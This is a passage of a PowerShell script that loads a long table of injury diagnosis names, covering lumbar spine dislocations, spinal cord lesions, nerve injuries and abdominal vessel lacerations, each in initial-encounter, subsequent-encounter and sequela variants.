vertebra","Subluxation of L1/L2 lumbar vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of L1/L2 lumbar vertebra","Dislocation of L1/L2 lumbar vertebra, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of L1/L2 lumbar vertebra","Dislocation of L1/L2 lumbar vertebra, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of L1/L2 lumbar vertebra","Dislocation of L1/L2 lumbar vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of L2/L3 lumbar vertebra","Subluxation of L2/L3 lumbar vertebra, initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of L2/L3 lumbar vertebra","Subluxation of L2/L3 lumbar vertebra, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of L2/L3 lumbar vertebra","Subluxation of L2/L3 lumbar vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of L2/L3 lumbar vertebra","Dislocation of L2/L3 lumbar vertebra, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of L2/L3 lumbar vertebra","Dislocation of L2/L3 lumbar vertebra, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of L2/L3 lumbar vertebra","Dislocation of L2/L3 lumbar vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of L3/L4 lumbar vertebra","Subluxation of L3/L4 lumbar vertebra, initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of L3/L4 lumbar vertebra","Subluxation of L3/L4 lumbar vertebra, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of L3/L4 lumbar vertebra","Subluxation of L3/L4 lumbar vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of L3/L4 lumbar vertebra","Dislocation of L3/L4 lumbar vertebra, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of L3/L4 lumbar vertebra","Dislocation of L3/L4 lumbar vertebra, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of L3/L4 lumbar vertebra","Dislocation of L3/L4 lumbar vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of L4/L5 lumbar vertebra","Subluxation of L4/L5 lumbar vertebra, initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of L4/L5 lumbar vertebra","Subluxation of L4/L5 lumbar vertebra, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of L4/L5 lumbar vertebra","Subluxation of L4/L5 lumbar vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of L4/L5 lumbar vertebra","Dislocation of L4/L5 lumbar vertebra, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of L4/L5 lumbar vertebra","Dislocation of L4/L5 lumbar vertebra, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of L4/L5 lumbar vertebra","Dislocation of L4/L5 lumbar vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of sacroiliac and sacrococcygeal joint","Dislocation of sacroiliac and sacrococcygeal joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of sacroiliac and sacrococcygeal joint","Dislocation of sacroiliac and sacrococcygeal joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of sacroiliac and sacrococcygeal joint","Dislocation of sacroiliac and sacrococcygeal joint, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of unspecified parts of lumbar spine and pelvis","Dislocation of unspecified parts of lumbar spine and pelvis, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of unspecified parts of lumbar spine and pelvis","Dislocation of unspecified parts of lumbar spine and pelvis, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of unspecified parts of lumbar spine and pelvis","Dislocation of unspecified parts of lumbar spine and pelvis, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of other parts of lumbar spine and pelvis","Dislocation of other parts of lumbar spine and pelvis, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of other parts of lumbar spine and pelvis","Dislocation of other parts of lumbar spine and pelvis, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of other parts of lumbar spine and pelvis","Dislocation of other parts of lumbar spine and pelvis, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of symphysis pubis","Traumatic rupture of symphysis pubis, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of symphysis pubis","Traumatic rupture of symphysis pubis, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of symphysis pubis","Traumatic rupture of symphysis pubis, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of ligaments of lumbar spine","Sprain of ligaments of lumbar spine, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of ligaments of lumbar spine","Sprain of ligaments of lumbar spine, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of ligaments of lumbar spine","Sprain of ligaments of lumbar spine, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of sacroiliac joint","Sprain of sacroiliac joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of sacroiliac joint","Sprain of sacroiliac joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of sacroiliac joint","Sprain of sacroiliac joint, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of other parts of lumbar spine and pelvis","Sprain of other parts of lumbar spine and pelvis, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of other parts of lumbar spine and pelvis","Sprain of other parts of lumbar spine and pelvis, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of other parts of lumbar spine and pelvis","Sprain of other parts of lumbar spine and pelvis, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of unspecified parts of lumbar spine and pelvis","Sprain of unspecified parts of lumbar spine and pelvis, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of unspecified parts of lumbar spine and pelvis","Sprain of unspecified parts of lumbar spine and pelvis, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of unspecified parts of lumbar spine and pelvis","Sprain of unspecified parts of lumbar spine and pelvis, sequela") + $null = $DiagnosisList.Rows.Add("Concussion and edema of lumbar spinal cord","Concussion and edema of lumbar spinal cord, initial encounter") + $null = $DiagnosisList.Rows.Add("Concussion and edema of lumbar spinal cord","Concussion and edema of lumbar spinal cord, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Concussion and edema of lumbar spinal cord","Concussion and edema of lumbar spinal cord, sequela") + $null = $DiagnosisList.Rows.Add("Concussion and edema of sacral spinal cord","Concussion and edema of sacral spinal cord, initial encounter") + $null = $DiagnosisList.Rows.Add("Concussion and edema of sacral spinal cord","Concussion and edema of sacral spinal cord, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Concussion and edema of sacral spinal cord","Concussion and edema of sacral spinal cord, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury to L1 level of lumbar spinal cord","Unspecified injury to L1 level of lumbar spinal cord, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury to L1 level of lumbar spinal cord","Unspecified injury to L1 level of lumbar spinal cord, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury to L1 level of lumbar spinal cord","Unspecified injury to L1 level of lumbar spinal cord, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury to L2 level of lumbar spinal cord","Unspecified injury to L2 level of lumbar spinal cord, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury to L2 level of lumbar spinal cord","Unspecified injury to L2 level of lumbar spinal cord, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury to L2 level of lumbar spinal cord","Unspecified injury to L2 level of lumbar spinal cord, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury to L3 level of lumbar spinal cord","Unspecified injury to L3 level of lumbar spinal cord, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury to L3 level of lumbar spinal cord","Unspecified injury to L3 level of lumbar spinal cord, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury to L3 level of lumbar spinal cord","Unspecified injury to L3 level of lumbar spinal cord, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury to L4 level of lumbar spinal cord","Unspecified injury to L4 level of lumbar spinal cord, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury to L4 level of lumbar spinal cord","Unspecified injury to L4 level of lumbar spinal cord, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury to L4 level of lumbar spinal cord","Unspecified injury to L4 level of lumbar spinal cord, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury to L5 level of lumbar spinal cord","Unspecified injury to L5 level of lumbar spinal cord, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury to L5 level of lumbar spinal cord","Unspecified injury to L5 level of lumbar spinal cord, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury to L5 level of lumbar spinal cord","Unspecified injury to L5 level of lumbar spinal cord, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury to unspecified level of lumbar spinal cord","Unspecified injury to unspecified level of lumbar spinal cord, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury to unspecified level of lumbar spinal cord","Unspecified injury to unspecified level of lumbar spinal cord, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury to unspecified level of lumbar spinal cord","Unspecified injury to unspecified level of lumbar spinal cord, sequela") + $null = $DiagnosisList.Rows.Add("Complete lesion of L1 level of lumbar spinal cord","Complete lesion of L1 level of lumbar spinal cord, initial encounter") + $null = $DiagnosisList.Rows.Add("Complete lesion of L1 level of lumbar spinal cord","Complete lesion of L1 level of lumbar spinal cord, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complete lesion of L1 level of lumbar spinal cord","Complete lesion of L1 level of lumbar spinal cord, sequela") + $null = $DiagnosisList.Rows.Add("Complete lesion of L2 level of lumbar spinal cord","Complete lesion of L2 level of lumbar spinal cord, initial encounter") + $null = $DiagnosisList.Rows.Add("Complete lesion of L2 level of lumbar spinal cord","Complete lesion of L2 level of lumbar spinal cord, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complete lesion of L2 level of lumbar spinal cord","Complete lesion of L2 level of lumbar spinal cord, sequela") + $null = $DiagnosisList.Rows.Add("Complete lesion of L3 level of lumbar spinal cord","Complete lesion of L3 level of lumbar spinal cord, initial encounter") + $null = $DiagnosisList.Rows.Add("Complete lesion of L3 level of lumbar spinal cord","Complete lesion of L3 level of lumbar spinal cord, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complete lesion of L3 level of lumbar spinal cord","Complete lesion of L3 level of lumbar spinal cord, sequela") + $null = $DiagnosisList.Rows.Add("Complete lesion of L4 level of lumbar spinal cord","Complete lesion of L4 level of lumbar spinal cord, initial encounter") + $null = $DiagnosisList.Rows.Add("Complete lesion of L4 level of lumbar spinal cord","Complete lesion of L4 level of lumbar spinal cord, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complete lesion of L4 level of lumbar spinal cord","Complete lesion of L4 level of lumbar spinal cord, sequela") + $null = $DiagnosisList.Rows.Add("Complete lesion of L5 level of lumbar spinal cord","Complete lesion of L5 level of lumbar spinal cord, initial encounter") + $null = $DiagnosisList.Rows.Add("Complete lesion of L5 level of lumbar spinal cord","Complete lesion of L5 level of lumbar spinal cord, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complete lesion of L5 level of lumbar spinal cord","Complete lesion of L5 level of lumbar spinal cord, sequela") + $null = $DiagnosisList.Rows.Add("Complete lesion of unspecified level of lumbar spinal cord","Complete lesion of unspecified level of lumbar spinal cord, initial encounter") + $null = $DiagnosisList.Rows.Add("Complete lesion of unspecified level of lumbar spinal cord","Complete lesion of unspecified level of lumbar spinal cord, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complete lesion of unspecified level of lumbar spinal cord","Complete lesion of unspecified level of lumbar spinal cord, sequela") + $null = $DiagnosisList.Rows.Add("Incomplete lesion of L1 level of lumbar spinal cord","Incomplete lesion of L1 level of lumbar spinal cord, initial encounter") + $null = $DiagnosisList.Rows.Add("Incomplete lesion of L1 level of lumbar spinal cord","Incomplete lesion of L1 level of lumbar spinal cord, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Incomplete lesion of L1 level of lumbar spinal cord","Incomplete lesion of L1 level of lumbar spinal cord, sequela") + $null = $DiagnosisList.Rows.Add("Incomplete lesion of L2 level of lumbar spinal cord","Incomplete lesion of L2 level of lumbar spinal cord, initial encounter") + $null = $DiagnosisList.Rows.Add("Incomplete lesion of L2 level of lumbar spinal cord","Incomplete lesion of L2 level of lumbar spinal cord, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Incomplete lesion of L2 level of lumbar spinal cord","Incomplete lesion of L2 level of lumbar spinal cord, sequela") + $null = $DiagnosisList.Rows.Add("Incomplete lesion of L3 level of lumbar spinal cord","Incomplete lesion of L3 level of lumbar spinal cord, initial encounter") + $null = $DiagnosisList.Rows.Add("Incomplete lesion of L3 level of lumbar spinal cord","Incomplete lesion of L3 level of lumbar spinal cord, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Incomplete lesion of L3 level of lumbar spinal cord","Incomplete lesion of L3 level of lumbar spinal cord, sequela") + $null = $DiagnosisList.Rows.Add("Incomplete lesion of L4 level of lumbar spinal cord","Incomplete lesion of L4 level of lumbar spinal cord, initial encounter") + $null = $DiagnosisList.Rows.Add("Incomplete lesion of L4 level of lumbar spinal cord","Incomplete lesion of L4 level of lumbar spinal cord, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Incomplete lesion of L4 level of lumbar spinal cord","Incomplete lesion of L4 level of lumbar spinal cord, sequela") + $null = $DiagnosisList.Rows.Add("Incomplete lesion of L5 level of lumbar spinal cord","Incomplete lesion of L5 level of lumbar spinal cord, initial encounter") + $null = $DiagnosisList.Rows.Add("Incomplete lesion of L5 level of lumbar spinal cord","Incomplete lesion of L5 level of lumbar spinal cord, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Incomplete lesion of L5 level of lumbar spinal cord","Incomplete lesion of L5 level of lumbar spinal cord, sequela") + $null = $DiagnosisList.Rows.Add("Incomplete lesion of unspecified level of lumbar spinal cord","Incomplete lesion of unspecified level of lumbar spinal cord, initial encounter") + $null = $DiagnosisList.Rows.Add("Incomplete lesion of unspecified level of lumbar spinal cord","Incomplete lesion of unspecified level of lumbar spinal cord, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Incomplete lesion of unspecified level of lumbar spinal cord","Incomplete lesion of unspecified level of lumbar spinal cord, sequela") + $null = $DiagnosisList.Rows.Add("Complete lesion of sacral spinal cord","Complete lesion of sacral spinal cord, initial encounter") + $null = $DiagnosisList.Rows.Add("Complete lesion of sacral spinal cord","Complete lesion of sacral spinal cord, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complete lesion of sacral spinal cord","Complete lesion of sacral spinal cord, sequela") + $null = $DiagnosisList.Rows.Add("Incomplete lesion of sacral spinal cord","Incomplete lesion of sacral spinal cord, initial encounter") + $null = $DiagnosisList.Rows.Add("Incomplete lesion of sacral spinal cord","Incomplete lesion of sacral spinal cord, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Incomplete lesion of sacral spinal cord","Incomplete lesion of sacral spinal cord, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury to sacral spinal cord","Unspecified injury to sacral spinal cord, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury to sacral spinal cord","Unspecified injury to sacral spinal cord, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury to sacral spinal cord","Unspecified injury to sacral spinal cord, sequela") + $null = $DiagnosisList.Rows.Add("Injury of nerve root of lumbar spine","Injury of nerve root of lumbar spine, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of nerve root of lumbar spine","Injury of nerve root of lumbar spine, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of nerve root of lumbar spine","Injury of nerve root of lumbar spine, sequela") + $null = $DiagnosisList.Rows.Add("Injury of nerve root of sacral spine","Injury of nerve root of sacral spine, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of nerve root of sacral spine","Injury of nerve root of sacral spine, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of nerve root of sacral spine","Injury of nerve root of sacral spine, sequela") + $null = $DiagnosisList.Rows.Add("Injury of cauda equina","Injury of cauda equina, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of cauda equina","Injury of cauda equina, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of cauda equina","Injury of cauda equina, sequela") + $null = $DiagnosisList.Rows.Add("Injury of lumbosacral plexus","Injury of lumbosacral plexus, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of lumbosacral plexus","Injury of lumbosacral plexus, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of lumbosacral plexus","Injury of lumbosacral plexus, sequela") + $null = $DiagnosisList.Rows.Add("Injury of lumbar, sacral and pelvic sympathetic nerves","Injury of lumbar, sacral and pelvic sympathetic nerves, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of lumbar, sacral and pelvic sympathetic nerves","Injury of lumbar, sacral and pelvic sympathetic nerves, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of lumbar, sacral and pelvic sympathetic nerves","Injury of lumbar, sacral and pelvic sympathetic nerves, sequela") + $null = $DiagnosisList.Rows.Add("Injury of peripheral nerve(s) at abdomen, lower back and pelvis level","Injury of peripheral nerve(s) at abdomen, lower back and pelvis level, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of peripheral nerve(s) at abdomen, lower back and pelvis level","Injury of peripheral nerve(s) at abdomen, lower back and pelvis level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of peripheral nerve(s) at abdomen, lower back and pelvis level","Injury of peripheral nerve(s) at abdomen, lower back and pelvis level, sequela") + $null = $DiagnosisList.Rows.Add("Injury of other nerves at abdomen, lower back and pelvis level","Injury of other nerves at abdomen, lower back and pelvis level, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of other nerves at abdomen, lower back and pelvis level","Injury of other nerves at abdomen, lower back and pelvis level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of other nerves at abdomen, lower back and pelvis level","Injury of other nerves at abdomen, lower back and pelvis level, sequela") + $null = $DiagnosisList.Rows.Add("Injury of unspecified nerves at abdomen, lower back and pelvis level","Injury of unspecified nerves at abdomen, lower back and pelvis level, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of unspecified nerves at abdomen, lower back and pelvis level","Injury of unspecified nerves at abdomen, lower back and pelvis level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of unspecified nerves at abdomen, lower back and pelvis level","Injury of unspecified nerves at abdomen, lower back and pelvis level, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of abdominal aorta","Unspecified injury of abdominal aorta, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of abdominal aorta","Unspecified injury of abdominal aorta, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of abdominal aorta","Unspecified injury of abdominal aorta, sequela") + $null = $DiagnosisList.Rows.Add("Minor laceration of abdominal aorta","Minor laceration of abdominal aorta, initial encounter") + $null = $DiagnosisList.Rows.Add("Minor laceration of abdominal aorta","Minor laceration of abdominal aorta, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Minor laceration of abdominal aorta","Minor laceration of abdominal aorta, sequela") + $null = $DiagnosisList.Rows.Add("Major laceration of abdominal aorta","Major laceration of abdominal aorta, initial encounter") + $null = $DiagnosisList.Rows.Add("Major laceration of abdominal aorta","Major laceration of abdominal aorta, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Major laceration of abdominal aorta","Major laceration of abdominal aorta, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of abdominal aorta","Other injury of abdominal aorta, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of abdominal aorta","Other injury of abdominal aorta, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of abdominal aorta","Other injury of abdominal aorta, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of inferior vena cava","Unspecified injury of inferior vena cava, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of inferior vena cava","Unspecified injury of inferior vena cava, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of inferior vena cava","Unspecified injury of inferior vena cava, sequela") + $null = $DiagnosisList.Rows.Add("Minor laceration of inferior vena cava","Minor laceration of inferior vena cava, initial encounter") + $null = $DiagnosisList.Rows.Add("Minor laceration of inferior vena cava","Minor laceration of inferior vena cava, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Minor laceration of inferior vena cava","Minor laceration of inferior vena cava, sequela") + $null = $DiagnosisList.Rows.Add("Major laceration of inferior vena cava","Major laceration of inferior vena cava, initial encounter") + $null = $DiagnosisList.Rows.Add("Major laceration of inferior vena cava","Major laceration of inferior vena cava, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Major laceration of inferior vena cava","Major laceration of inferior vena cava, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of inferior vena cava","Other injury of inferior vena cava, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of inferior vena cava","Other injury of inferior vena cava, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of inferior vena cava","Other injury of inferior vena cava, sequela") + $null = $DiagnosisList.Rows.Add("Minor laceration of celiac artery","Minor laceration of celiac artery, initial encounter") + $null = $DiagnosisList.Rows.Add("Minor laceration of celiac artery","Minor laceration of celiac artery, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Minor laceration of celiac artery","Minor laceration of celiac artery, sequela") + $null = $DiagnosisList.Rows.Add("Major laceration of celiac artery","Major laceration of celiac artery, initial encounter") + $null = $DiagnosisList.Rows.Add("Major laceration of celiac artery","Major laceration of celiac artery, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Major laceration of celiac artery","Major laceration of celiac artery, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of celiac artery","Other injury of celiac artery, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of celiac artery","Other injury of celiac artery, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of celiac artery","Other injury of celiac artery, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of celiac artery","Unspecified injury of celiac artery, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of celiac artery","Unspecified injury of celiac artery, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of celiac artery","Unspecified injury of celiac artery, sequela") + $null = $DiagnosisList.Rows.Add("Minor laceration of superior mesenteric artery","Minor laceration of superior mesenteric artery, initial encounter") + $null = $DiagnosisList.Rows.Add("Minor laceration of superior mesenteric artery","Minor laceration of superior mesenteric artery, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Minor laceration of superior mesenteric artery","Minor laceration of superior mesenteric artery, sequela") + $null = $DiagnosisList.Rows.Add("Major laceration of superior mesenteric artery","Major laceration of superior mesenteric artery, initial encounter") + $null = $DiagnosisList.Rows.Add("Major laceration of superior mesenteric artery","Major laceration of superior mesenteric artery, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Major laceration of superior mesenteric artery","Major laceration of superior mesenteric artery, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of superior mesenteric artery","Other injury of superior mesenteric artery, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of superior mesenteric artery","Other injury of superior mesenteric artery, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of superior mesenteric artery","Other injury of superior mesenteric artery, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of superior mesenteric artery","Unspecified injury of superior mesenteric artery, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of superior mesenteric artery","Unspecified injury of superior mesenteric artery, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of superior mesenteric artery","Unspecified injury of superior mesenteric artery, sequela") + $null = $DiagnosisList.Rows.Add("Minor laceration of inferior mesenteric artery","Minor laceration of inferior mesenteric artery, initial encounter") + $null = $DiagnosisList.Rows.Add("Minor laceration of inferior mesenteric artery","Minor laceration of inferior mesenteric artery, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Minor laceration of inferior mesenteric artery","Minor laceration of inferior mesenteric artery, sequela") + $null = $DiagnosisList.Rows.Add("Major laceration of inferior mesenteric artery","Major laceration of inferior mesenteric artery, initial encounter") + $null = $DiagnosisList.Rows.Add("Major laceration of inferior mesenteric artery","Major laceration of inferior mesenteric artery, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Major laceration of inferior mesenteric artery","Major laceration of inferior mesenteric artery, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of inferior mesenteric artery","Other injury of inferior mesenteric artery, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of inferior mesenteric artery","Other injury of inferior mesenteric artery, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of inferior mesenteric artery","Other injury of inferior mesenteric artery, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of inferior mesenteric artery","Unspecified injury of inferior mesenteric artery, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of inferior mesenteric artery","Unspecified injury of inferior mesenteric artery, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of inferior mesenteric artery","Unspecified injury of inferior mesenteric artery, sequela") + $null = $DiagnosisList.Rows.Add("Minor laceration of branches of celiac and mesenteric artery","Minor laceration of branches of celiac and mesenteric artery, initial encounter") + $null = $DiagnosisList.Rows.Add("Minor laceration of branches of celiac and mesenteric artery","Minor laceration of branches of celiac and mesenteric artery, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Minor laceration of branches of celiac and mesenteric artery","Minor laceration of branches of celiac and mesenteric artery, sequela") + $null = $DiagnosisList.Rows.Add("Major laceration of branches of celiac and mesenteric artery","Major laceration of branches of celiac and mesenteric artery, initial encounter") + $null = $DiagnosisList.Rows.Add("Major laceration of branches of celiac and mesenteric artery","Major laceration of branches of celiac and mesenteric artery, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Major laceration of branches of celiac and mesenteric artery","Major laceration of branches of celiac and mesenteric artery, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of branches of celiac and mesenteric artery","Other injury of branches of celiac and mesenteric artery, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of branches of celiac and mesenteric artery","Other injury of branches of celiac and mesenteric artery, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of branches of celiac and mesenteric artery","Other injury of branches of celiac and mesenteric artery, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of branches of celiac and mesenteric artery","Unspecified injury of branches of celiac and mesenteric artery, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of branches of celiac and mesenteric artery","Unspecified injury of branches of celiac and mesenteric artery, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of branches of celiac and mesenteric artery","Unspecified injury of branches of celiac and mesenteric artery, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of portal vein","Laceration of portal vein, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of portal vein","Laceration of portal vein, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of portal vein","Laceration of portal vein, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of portal vein","Other specified injury of portal vein, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of portal vein","Other specified injury of portal vein, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of portal vein","Other specified injury of portal vein, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of portal vein","Unspecified injury of portal vein, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of portal vein","Unspecified injury of portal vein, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of portal vein","Unspecified injury of portal vein, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of splenic vein","Laceration of splenic vein, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of splenic vein","Laceration of splenic vein, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of splenic vein","Laceration of splenic vein, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of splenic vein","Other specified injury of splenic vein, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of splenic vein","Other specified injury of splenic vein, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of splenic vein","Other specified injury of splenic vein, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of splenic vein","Unspecified injury of splenic vein, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of splenic vein","Unspecified injury of splenic vein, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of splenic vein","Unspecified injury of splenic vein, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of superior mesenteric vein","Laceration of superior mesenteric vein, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of superior mesenteric vein","Laceration of superior mesenteric vein, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of superior mesenteric vein","Laceration of superior mesenteric vein, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of superior mesenteric vein","Other specified injury of superior mesenteric vein, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of superior mesenteric vein","Other specified injury of superior mesenteric vein, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of superior mesenteric vein","Other specified injury of superior mesenteric vein, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of superior mesenteric vein","Unspecified injury of superior mesenteric vein, initial encounter") + $null = 